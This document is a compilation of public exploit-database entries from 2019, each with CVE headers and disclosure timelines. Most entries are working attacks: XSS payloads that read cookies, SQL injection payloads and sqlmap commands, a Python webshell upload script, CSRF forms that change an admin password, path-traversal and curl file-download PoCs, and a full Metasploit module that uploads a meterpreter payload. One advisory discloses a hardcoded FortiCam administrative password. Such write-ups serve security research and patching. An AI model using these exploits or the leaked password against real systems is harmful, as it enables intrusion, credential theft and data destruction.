# Exploit Title: CWP (CentOS Control Web Panel) Reflected Cross Site Scripting
# Date: 23 July 2019
# Exploit Author: Pongtorn Angsuchotmetee, Nissana Sirijirakal, Narin Boonwasanarak
# Vendor Homepage: https://control-webpanel.com/
# Version: 0.9.8.846
# Tested on: CentOS 7.6.1810 (Core) FireFox 68.0.1 (64-bit)
# CVE : CVE-2019-13387

+++++++++++++++++++++++++++++++++
#  Description:
+++++++++++++++++++++++++++++++++

CWP Version 0.9.8.846 have implemented token in every URL to prevent cross site scripting.
But the aplication checks only length of the token, this allows attacker to follow the token format to bypass XSS protection

Refer CVE:2018-18324

+++++++++++++++++++++++++++++++++
#  Steps to Reproduce
+++++++++++++++++++++++++++++++++
Example : https://[target.com]:2083/cwp_xxxxxxxxxxxxxxxx/user1/fileManager2.php?frame=3&fm_current_dir=</script><script>alert(document.cookie)</script>

Parameter Name: fm_current_dir

Attack Pattern for XSS: </script><script>alert(document.cookie)</script> 

+++++++++++++++++++++++++++++++++
# PoC
+++++++++++++++++++++++++++++++++

https://github.com/i3umi3iei3ii/CentOS-Control-Web-Panel-CVE/blob/master/CVE-2019-13387.md


+++++++++++++++++++++++++++++++++
#  Timeline
+++++++++++++++++++++++++++++++++
2019-07-07: Discovered the bug
2019-07-07: Reported to vendor
2019-07-07: Vender accepted the vulnerability
2019-07-15: The vulnerability has been fixed
2019-07-23: Published

+++++++++++++++++++++++++++++++++
# Discovered by
+++++++++++++++++++++++++++++++++
Pongtorn Angsuchotmetee
Nissana Sirijirakal
Narin Boonwasanarak

Active PHP Bookmarks v1.3 'cookie_auth' Error-Based SQL Injection
Vulnerability

This is only for demonstration!

Exploitation: If you want to retrieve all database, use sqlmap.


Disclaimer:
This or previous programs is for Educational  
purpose ONLY. Do not use it without permission.  
The usual disclaimer applies, especially the  
fact that Todor Donev is not liable for any  
damages caused by direct or indirect use of the  
information or functionality provided by these  
programs. The author or any Internet provider  
bears NO responsibility for content or misuse  
of these programs or any derivatives thereof.
By using these programs you accept the fact  
that any damage (dataloss, system crash,  
system compromise, etc.) caused by the use  
of these programs is not Todor Donev's  
responsibility.

Use them at your own risk!


Weakness: http://server/path/cookie_auth.php?action=cookie_login

---
Place: POST
Parameter: form_username
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: form_username=' AND (SELECT 5293 FROM(SELECT
COUNT(*),CONCAT(0x7176727271,(SELECT (CASE WHEN (5293=5293) THEN 1 ELSE
0 END)),0x716c736971,FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)-- ASjU
---

import requests

URL = "http://127.0.0.1/ARMBot/upload.php"
r = requests.post(URL,
                  data = {
"file":"../public_html/lol/../.s.phtml", # need some trickery for each server ;)
"data":"PD9waHAgZWNobyAxOyA/Pg==", # <?php echo 1; ?>
"message":"Bobr Dobr"
                  }, proxies={"http":"127.0.0.1:8080","https":"127.0.0.1:8080"})
print(r.status_code)
print("shell should be at http://{}/.s.phtml".format(URL))

# Exploit Title: JoomSport 3.3 – for Sports - SQL injection
# Google Dork: intext:powered by JoomSport - sport WordPress plugin
# Date:29/07/2019.
# Exploit Author: Pablo Santiago
# Vendor Homepage: https://beardev.com/
# Software Link: https://wordpress.org/plugins/joomsport-sports-league-results-management/
# Version: 3.3
# Tested on: Windows and Kali linux
# CVE :2019-14348
# References: https://hackpuntes.com/cve-2019-14348-joomsport-for-sports-sql-injection/

# 1. Technical Description:
#Through the SQL injection vulnerability, a malicious user could
inject SQL code in order to steal information from the database,
modify data from the database, even delete database or data from
them.

#2.  Request: All requests that contains the parameter sid are
vulnerables to SQL injection

POST /wordpress/joomsport_season/new-yorkers/?action=playerlist HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0)
Gecko/20100101 Firefox/67.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://localhost/wordpress/joomsport_season/new-yorkers/?action=playerlist
Content-Type: application/x-www-form-urlencoded
Content-Length: 22
DNT: 1
Connection: close
Cookie: PHPSESSID=s010flbg7fbohnguabsvjaut40
Upgrade-Insecure-Requests: 1

sid=1&page=1&jscurtab=

# 3. Payload:

Parameter: sid (POST)
   Type: boolean-based blind
   Title:  Or boolean-based blind - WHERE or HAVING clause
   Payload: sid=-3506 OR 7339=7339&page=1jscurtab=

# 4. Reference:
# https://hackpuntes.com/cve-2019-14348-joomsport-for-sports-sql-injection/

Original posting:
https://xor.cat/2019/08/05/fortinet-fortirecorder-hardcoded-password/

Text archive available here:
https://xor.cat/archive/2019/08/05/fortinet-fortirecorder-hardcoded-password.txt

## Background

In June of 2019 I discovered a vulnerability in Fortinet's
FortiRecorder[1] product which impacts the FortiCam devices that are
connected to a FortiRecorder.

The FortiRecorder is a network video recorder product which administers
and manages footage from FortiCam devices connected to it.

Version 2.7.0 GA of the FortiRecorder VM is what was initially used to
discover this vulnerability, however I have since tested all versions
through to v2.7.3, and they are all vulnerable to the same flaw.

I have confirmed that this vulnerability affects the FortiCam FCM-MB40
device, however it is very likely that the majority of other FortiCam
models are also affected.

Fortinet has provided a fix for this issue in FortiRecorder v2.7.4.

CVE-2019-6698[2] has been assigned to refer to this vulnerability.

## CVE-2019-6698 - FortiRecorder Hardcoded Password

### Summary

Fortinet FortiRecorder Hardcoded Password Vulnerability

    Product: FortiRecorder - All Models
    Version: v2.7.3 and prior versions
    Vendor: Fortinet
    CVE-ID: CVE-2019-6698
    CWE-798: Use of Hard-coded Credentials

The FortiRecorder appliance sets a hardcoded administrative password on
all FortiCams which join it. This password is identical for all
FortiRecorder instances, and for all cameras connected to each
FortiRecorder.

### Details

Upon joining a FortiCam to a FortiRecorder, the FortiRecorder changes
the account passwords for the FortiCam's web administration interface.

The password set by the FortiRecorder for the `fcamOperator`
administrative account is identical across different FortiCams, and
across different FortiRecorder installations.

Because the username and password for the web administration interface
on the FCM-MB40 is stored in cleartext on the filesystem, it is trivial
for an attacker with access to a FCM-MB40 device to read these
credentials, and use them to illegitimately access other FortiCam
devices.

The username and password which are set by the FortiRecorder, and stored
in plaintext on the FCM-MB40's filesystem in `/etc/appWeb/appweb.pass`
appear as follows:

```
$ cat /etc/appWeb/appweb.pass
admin:**************
fcamOperator:12680b17534491
```

This file can only be accessed by gaining access to the filesystem of
the FortiCam device. I describe some methods of gaining FCM-MB40
filesystem access in this post[3].

### Recommended Remediation

 * Securely generated random passwords should be created for each new
   FortiCam device which joins the FortiRecorder, and all existing
   cameras should have their passwords replaced with securely generated
   random passwords.

### Recommendations For Users

If you are using a FortiRecorder device, consider the below tips in
order harden your devices, and protect your network.

 * Keep these devices in a segregated environment with firewall rules
   preventing them from communicating with the Internet, or other
   networks in your environment, and preventing other devices on your
   network from communicating with them. If possible, prevent all
   devices except the FortiRecorder from communicating with FortiCam
   devices.
 * Ensure the FortiRecorder device and it's attached cameras are all up
   to date.

### Fix Information

Fortinet has provided a patch for this issue in FortiRecorder v2.7.4,
released on August 2nd, 2019.

An account on support.fortinet.com[4] is required to gain access to the
patch.

I have yet to confirm how or whether the patch successfully fixes the
vulnerability.

## Timeline

2019-06-21
 * Reached out to Fortinet PSIRT, providing full vulnerability
   information including intended date of disclosure 45 days from the
   date, 2019-08-05.

2019-06-25 (+4 days)
 * Received acknowledgement of receipt from PSIRT.
 * PSIRT asked for more information regarding discovery of the
   vulnerability.
 * I respond with detail describing where I found the plaintext
   password.

2019-07-05 (+14 days)
 * Received a response from PSIRT stating the issue was already known,
   and had been reported by an internal team, and that it is scheduled
   to be fixed soon.

2019-07-16 (+25 days)
 * Received an email from PSIRT stating that they expect me to wait at
   least 90-120 days before publicly disclosing the vulnerability.
 * I respond with details describing why the 45 day disclosure was
   chosen, and that I will be publicly disclosing details about this
   issue on 2019-08-05, the original date which I advised of in the
   first email.

2019-07-23 (+32 days)
 * Received a response from PSIRT stating that the customer risk created
   by this vulnerability is reduced because FortiRecorder is usually
   deployed in a closed network environment, though PSIRT still consider
   the issue to carry a high severity. This message also stated that
   fixing the vulnerability may not be as simple as I envision because
   deep consideration and planning would be involved to create an
   improved solution. Fortinet repeated their request for a 90-120 day
   disclosure period, stating that if I complied, I would be
   acknowledged in the PSIRT advisory. PSIRT also asked how I gained
   access to the filesystem of the device to find the plaintext password
   file.
 * I respond stating that I still believe 45 days is a reasonable time
   period for a fix to be developed, documented, tested, QA'd and
   released. I re-iterate that I will be publicly disclosing details of
   the vulnerability on 2019-08-05, 13 days from the response.
 * My response also provides a link to [my previous post][3] describing
   how I gained access to the FortiCam's filesystem.
 * I ask PSIRT whether Fortinet will be assigning a CVE ID for the
   issue.

2019-07-25 (+34 days)
 * Received a response from PSIRT stating that they will be assigning a
   CVE for the issue. PSIRT also ask for a copy of my disclosure
   advisory in advance of publication to help coordinate their
   disclosure.
 * I respond stating that I will provide a full copy of my disclosure to
   PSIRT two business days prior to public release.

2019-07-31 (+40 days)
 * Received an update stating that a fix for this issue is planned for
   release in FortiRecorder v2.7.4.
 * I send PSIRT a full copy of my intended disclosure details.
 * Fortinet confirm that my disclosure details are acceptable.

2019-08-02 (+42 days)
 * Fortinet releases FortiRecorder v2.7.4, which they state fixes the
   issue.

2019-08-05 (+45 days)
 * This post is published.

## Closure

Thank you for reading.

[1]: https://www.fortinet.com/content/dam/fortinet/assets/data-sheets/FortiRecorder.pdf
[2]: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-6698
[3]: https://xor.cat/2019/06/19/fortinet-forticam-vulns/
[4]: https://support.fortinet.com/

-- 
XORcat
PGP Key: 0xA528A62C
https://keybase.io/xorcat

# Exploit Title: Daily Expense Manager - CSRF (Delete Income)
# Exploit Author: Mr Winst0n
# Author E-mail: manamtabeshekan@gmail.com
# Discovery Date: August 8, 2019
# Vendor Homepage: https://sourceforge.net/projects/daily-expense-manager/
# Tested Version: 1.0
# Tested on: Parrot OS


# PoC:

<html>
<body>
<form action="http://expense.adminspoint.com/homeedit.php?delincome=778" method="post">
<input type="submit" value="Click!" />
</form>
</body>
</html>

[waraxe-2019-SA#110] - Reflected XSS in MapProxy 1.11.0
================================================================================

Author: Janek Vind "waraxe"
Date: 07. August 2019
Location: Estonia, Tartu
Web: http://www.waraxe.us/advisory-110.html

Target description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

MapProxy is an open source proxy for geospatial data. It caches, accelerates and
transforms data from existing map services and serves any desktop or web GIS client.

https://mapproxy.org/

Vulnerable version: 1.11.0
Fixed version: 1.11.1

###############################################################################
1. Reflected XSS in demo service
###############################################################################

Reason:
  * Insufficient sanitization of user-supplied data
Attack vector:
  * User-supplied GET parameter "format"

Testing for Reflected XSS:

https://valid.host/demo/?wmts_layer=valid_layer&format=png"foo'bar&srs=valid_srs

Hostname, "wmts_layer" and "srs" must be valid.
Let's look at the HTML source:

------------------------[ source code start ]----------------------------------

<input type="hidden" name="format" value="png"foo'bar">

------------------------[ source code end ]------------------------------------

We can see that double quote character from GET parameter "format" is not sanitized
by MapProxy and this allows us to "break out" from HTML input element.
Unfortunately for attacker it's hidden input element and this kind of XSS issues
are hard to exploit:

https://portswigger.net/blog/xss-in-hidden-input-fields

But it appears that there is one more injection point:

------------------------[ source code start ]----------------------------------
var layer = new OpenLayers.Layer.WMTS({
name: "valid_layer",
url: '../wmts/valid_layer/{TileMatrixSet}/{TileMatrix}/{TileCol}/{TileRow}.png',
layer: 'valid_layer',
matrixSet: 'GMC',
format: 'png"foo'bar', <--- Injection point
isBaseLayer: true,
style: 'default',
requestEncoding: 'REST'
});
------------------------[ source code end ]------------------------------------

As seen above, MapProxy fails to sanitize single quotes too and this allows us
direct JavaScript injection.

Working XSS PoC:

https://valid.host/demo/?wmts_layer=valid_layer&format=png'-alert('XSS')-'&srs=valid_srs

It's worth to mention that XSS payload length is probably limited only with URL
max length and test with 1000 byte long payload was successful.
One more thing - Chrome web browser has built-in XSS countermeasures, but this exploit
works even with Chrome.

And of course it's possible to use more sophisticated XSS payloads:

https://valid.host/mapproxy/demo/?wmts_layer=valid_layer&
format=png'-eval(String.fromCharCode(97,108,101,114,116,40,39,88,83,83,39,41))-'&srs=valid_srs

Disclosure timeline:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

12.07.2019 -> First email sent to developers
12.07.2019 -> Got first response from developers
12.07.2019 -> Sending detailed information to developers
06.08.2019 -> Found problems are fixed, new version available
07.08.2019 -> Waraxe advisory released

Contact:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

come2waraxe@yahoo.com
Janek Vind "waraxe"

Waraxe forum:  http://www.waraxe.us/
Personal homepage: http://www.janekvind.com/

# Exploit Title: [title]
# Date: [2019 08 06]
# Exploit Author: [Greg.Priest]
# Vendor Homepage: [https://open-school.org/]
# Software Link: []
# Version: [Open-School 3.0/Community Edition 2.3]
# Tested on: [Windows/Linux ]
# CVE : [CVE-2019-14696]


Open-School 3.0, and Community Edition 2.3, allows XSS via the /index.php?r=students/guardians/create id parameter.

/index.php?r=students/guardians/create&id=1[inject JavaScript Code]

Example:
/index.php?r=students/guardians/create&id=1<script>alert("PWN3D!")</script><script>alert("PWN3D!")</script>

# Exploit Title: Aptana Jaxer Remote Local File inclusion
# Date: 8/8/2019
# Exploit Author: Steph Jensen
# Vendor Homepage:
[http://www.jaxer.org](http://www.jaxer.org/category/uncategorized/)
# Version: 1.0.3.4547
# Tested on: Linux
# CVE : CVE-2019-14312

Aptana Jaxer 1.0.3.4547 is vulnerable to a local file inclusion vulnerability in the wikilite source code viewer. This vulnerability allows a remote attacker to read internal files on the server via tools/sourceViewer/index.html?filename=../ URI.

To exploit this vulnerability an attacker must have access to the Aptana Jaxer web application. The Samples and Tools page will have the wikilite demo. After opening the wikilite demo the source code can be viewed by clicking the html button and selecting "Wikilite source code". This leads to http://server:8081/aptana/tools/sourceViewer/index.html?filename=../../samples/wikilite/index.html. by using directory traversal in the filename parameter a remote attacker can access internal files on the server.

PoC: http://server:8081/aptana/tools/sourceViewer/index.html?filename=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'net/http'

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking
  include Msf::Exploit::Remote::HttpClient

  def initialize(info={})
    super(update_info(info,
'Name'           => "Baldr Botnet Panel Shell Upload Exploit",
'Description'    => %q{
        This module exploits the file upload vulnerability of baldr malware panel.
      },
'License'        => MSF_LICENSE,
'Author'         =>
        [
'Ege Balcı <ege.balci@invictuseurope.com>' # author & msf module
        ],
'References'     =>
        [
          ['URL', 'https://prodaft.com']
        ],
'DefaultOptions'  =>
        {
'SSL' => false,
'WfsDelay' => 5,
        },
'Platform'       => ['php'],
'Arch'           => [ ARCH_PHP],
'Targets'        =>
        [
          ['Auto',
            {
'Platform' => 'PHP',
'Arch' => ARCH_PHP,
'DefaultOptions' => {'PAYLOAD'  => 'php/meterpreter/bind_tcp'}
            }
          ],
          ['Baldr <= v2.0',
            {
'Platform' => 'PHP',
'Arch' => ARCH_PHP,
'DefaultOptions' => {'PAYLOAD'  => 'php/meterpreter/bind_tcp'}
            }
          ],
          ['Baldr v2.2',
            {
'Platform' => 'PHP',
'Arch' => ARCH_PHP,
'DefaultOptions' => {'PAYLOAD'  => 'php/meterpreter/bind_tcp'}
            }
          ],
          ['Baldr v3.0 & v3.1',
            {
'Platform' => 'PHP',
'Arch' => ARCH_PHP,
'DefaultOptions' => {'PAYLOAD'  => 'php/meterpreter/bind_tcp'}
            }
          ]
        ],
'Privileged'     => false,
'DisclosureDate' => "Dec 19 2018",
'DefaultTarget'  => 0
    ))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The URI of the baldr gate', '/']),
      ]
    )
  end

  def check 
    res = send_request_cgi(
'method'    => 'GET',
'uri'       => normalize_uri(target_uri.path,"/gate.php")
    )

    ver = ''

    if res.code == 200
      if res.body.include?('~;~')
        targets[3] = targets[0]
        #target = targets[3]
        ver = '>= v3.0'
      elsif res.body.include?(';')
        #target = targets[2]
        targets[2] = targets[0]
        ver = 'v2.2'
      elsif res.body.size < 4
        targets[1] = targets[0]
        #target = targets[1]
        ver = '<= v2.0'
      else
        Exploit::CheckCode::Safe  
      end
      print_status("Baldr verison: #{ver}")
      Exploit::CheckCode::Vulnerable
    else
      Exploit::CheckCode::Safe
    end
  end

  def exploit

    name = '.'+Rex::Text.rand_text_alpha(4)
    files =
    [
      {data: payload.encoded, fname: "#{name}.php"}
    ]
    zip = Msf::Util::EXE.to_zip(files) 
    hwid = Rex::Text.rand_text_alpha(8).upcase

    if targets[0]
      check
    end


    case target
    when targets[3]
      res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path,"/gate.php")}
      )
      key = res.body.to_s.split('~;~')[0]
      print_good("Key: #{key}")

      data = "hwid=#{hwid}&os=Windows 10 x64&cookie=0&paswd=0&credit=0&wallet=0&file=1&autofill=0&version=v3.0"
      data = xor(data,key)

      res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path,"/gate.php"),
'data'  => data.to_s
        }
      )

      if res.code == 200
        print_good("Bot successfully registered.")
      else
        print_error("New bot register failed !")
        return false
      end

      data = xor(zip.to_s,key)
      form = Rex::MIME::Message.new
      form.add_part(data.to_s, 'application/octet-stream', 'binary', "form-data; name=\"file\"; filename=\"file.zip\"")

      res = send_request_cgi(
'method'    => 'POST',
'uri'       => normalize_uri(target_uri.path,"/gate.php"),
'ctype'     => "multipart/form-data; boundary=#{form.bound}",
'data'      => form.to_s
      )
      if res && (res.code == 200 ||res.code == 100)
        print_good("Payload uploaded to /logs/#{hwid}/#{name}.php")
      else
        print_error("Server responded with code #{res.code}") if res
        print_error("Failed to upload payload.")
        return false
      end

    when targets[2]
      res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path,"/gate.php")}
      )
      key = res.body.to_s.split(';')[0]
      print_good("Key: #{key}")
      data = "hwid=#{hwid}&os=Windows 7 x64&cookie=0&paswd=0&credit=0&wallet=0&file=1&autofill=0&version=v2.2***"
      data << zip.to_s

      result = ""
      codepoints = data.each_codepoint.to_a
      codepoints.each_index do |i|
          result += (codepoints[i] ^ key[i % key.size].ord).chr
      end

      res = send_request_cgi(
'method'    => 'POST',
'uri'       => normalize_uri(target_uri.path,"/gate.php"),
'data'      => result.to_s
      )
      if res && (res.code == 200 ||res.code == 100)
        print_good("Payload uploaded to /logs/#{hwid}/#{name}.php")
      else
        print_error("Server responded with code #{res.code}") if res
        print_error("Failed to upload payload.")
        return false
      end
    else
      res = send_request_cgi(
'method'    => 'POST',
'uri'       => normalize_uri(target_uri.path,"/gate.php"),
'data'      => zip.to_s,
'encode_params' => true,
'vars_get'  => {
'hwid'  => hwid,
'os'  => 'Windows 7 x64',
'cookie'  => '0',
'pswd'  => '0',
'credit'  => '0',
'wallet'  => '0',
'file'  => '1',
'autofill'  => '0',
'version'  => 'v2.0'
        }
      )

      if res && (res.code == 200 ||res.code == 100)
        print_good("Payload uploaded to /logs/#{hwid}/#{name}.php")
      else
        print_error("Server responded with code #{res.code}") if res
        print_error("Failed to upload payload.")
        return false
      end
    end


    send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path,"/logs/#{hwid}/#{name}.php")}, 3
    )

    print_good("Payload successfully triggered !")
  end

  def xor(data, key)
    result = ""
    codepoints = data.each_codepoint.to_a
    codepoints.each_index do |i|
        result += (codepoints[i] ^ key[i % key.size].ord).chr
    end
    return result
  end


end

#Exploit Title: Joomla! component com_jssupportticket - SQL Injection
#Dork: inurl:"index.php?option=com_jssupportticket"
#Date: 08.08.19
#Exploit Author: qw3rTyTy
#Vendor Homepage: https://www.joomsky.com/
#Software Link: https://www.joomsky.com/46/download/1.html
#Version: 1.1.5
#Tested on: Debian/nginx/joomla 3.9.0
#####################################
#Vulnerability details:
#####################################
Vulnerable code is in line 441 in file admin/models/userfields.php

   439      function dataForDepandantField( $val , $childfield){ 
   440          $db = $this->getDBO();
   441          $query = "SELECT userfieldparams,fieldtitle,field,depandant_field FROM `#__js_ticket_fieldsordering` WHERE field = '".$childfield."'"; //!!!
   442          $db->setQuery($query);
   443          $data = $db->loadObject();
   444          $decoded_data = json_decode($data->userfieldparams); 
   445          $comboOptions = array(); 
   446          $flag = 0; 
   447          foreach ($decoded_data as $key => $value) { 
   448              if($key == $val){ 
   449                 for ($i=0; $i < count($value) ; $i++) {  
   450                  if($flag == 0){
   451                      $comboOptions[] = array('value' => '', 'text' => JText::_('Select').''.$data->fieldtitle); 
   452                  }
   453                  $comboOptions[] = array('value' => $value[$i], 'text' => $value[$i]); 
   454                  $flag = 1; 
   455                 } 
   456              } 
   457          }
   458          $jsFunction = ''; 
   459          if ($data->depandant_field != null) {
   460              $jsFunction = "onchange=getDataForDepandantField('" . $data->field . "','" . $data->depandant_field . "',1);";
   461          }
   462          $html = JHTML::_('select.genericList', $comboOptions , $childfield,'class="inputbox one"'.$jsFunction, 'value' , 'text' ,'');
   463          return $html; 
   464      }

#####################################
#PoC:
#####################################
$> sqlmap.py -u "http://localhost/index.php?option=com_jssupportticket&c=ticket&task=datafordepandantfield&fvalue=0&child=0" --random-agent -p child --dbms=mysql

#Exploit Title: Joomla! component com_jssupportticket - Arbitrary File Download
#Dork: inurl:"index.php?option=com_jssupportticket"
#Date: 08.08.19
#Exploit Author: qw3rTyTy
#Vendor Homepage: http://joomsky.com/
#Software Link: https://www.joomsky.com/46/download/1.html
#Version: 1.1.5
#Tested on: Debian/nginx/joomla 3.9.0
#####################################
#Vulnerability details:
#####################################
Vulnerable code is in line 1411 in file admin/models/ticket.php

  1382      function getDownloadAttachmentByName($file_name,$id){
  1383          if(empty($file_name)) return false;
  1384          if(!is_numeric($id)) return false;
  1385          $db = JFactory::getDbo();
  1386          $filename = str_replace('', '_',$file_name);
  1387          $query = "SELECT attachmentdir FROM `#__js_ticket_tickets` WHERE id = ".$id;
  1388          $db->setQuery($query);
  1389          $foldername = $db->loadResult();
  1390  
  1391          $datadirectory = $this->getJSModel('config')->getConfigurationByName('data_directory');
  1392          $base = JPATH_BASE;
  1393          if(JFactory::getApplication()->isAdmin()){
  1394              $base = substr($base, 0, strlen($base) - 14); //remove administrator    
  1395          }  
  1396          $path = $base.'/'.$datadirectory;
  1397          $path = $path . '/attachmentdata';
  1398          $path = $path . '/ticket/' . $foldername;
  1399          $file = $path . '/' . $filename;
  1400  
  1401          header('Content-Description: File Transfer');
  1402          header('Content-Type: application/octet-stream');
  1403          header('Content-Disposition: attachment; filename=' . basename($file));
  1404          header('Content-Transfer-Encoding: binary');
  1405          header('Expires: 0');
  1406          header('Cache-Control: must-revalidate, post-check=0, pre-check=0');
  1407          header('Pragma: public');
  1408          header('Content-Length: ' . filesize($file));
  1409          //ob_clean();
  1410          flush();
  1411          readfile($file);    //!!!
  1412          exit();
  1413          exit;
  1414      }

#####################################
#PoC:
#####################################
$> curl -X GET -i "http://localhost/index.php?option=com_jssupportticket&c=ticket&task=downloadbyname&id=0&name=../../../configuration.php"

# Exploit Title: Adive Framework 2.0.7 – Cross-Site Request Forgery (CSRF)
# Date:02/08/2019.
# Exploit Author: Pablo Santiago
# Vendor Homepage: https://adive.es
# Software Link: https://github.com/ferdinandmartin/adive-php7
# Version: 2.0.7
# Tested on: Windows and Kali linux
# CVE :2019-14346

# 1. Technical Description:
# Adive Framework 2.0.7 and possibly before are affected by Cross-Site
#Request Forgery vulnerability, an attacker could change any user
password.

# 2. Proof Of Concept (CODE):

<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://localhost/adive/admin/config" method="POST">
<input type="hidden" name="userName" value="admin" />
<input type="hidden" name="confPermissions" value="1" />
<input type="hidden" name="pass" value="1234" />
<input type="hidden" name="cpass" value="1234" />
<input type="hidden" name="invokeType" value="web" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>

# 3. References:
# https://hackpuntes.com/cve-2019-14346-adive-framework-2-0-7-cross-site-request-forgery/
# https://imgur.com/apuZa9q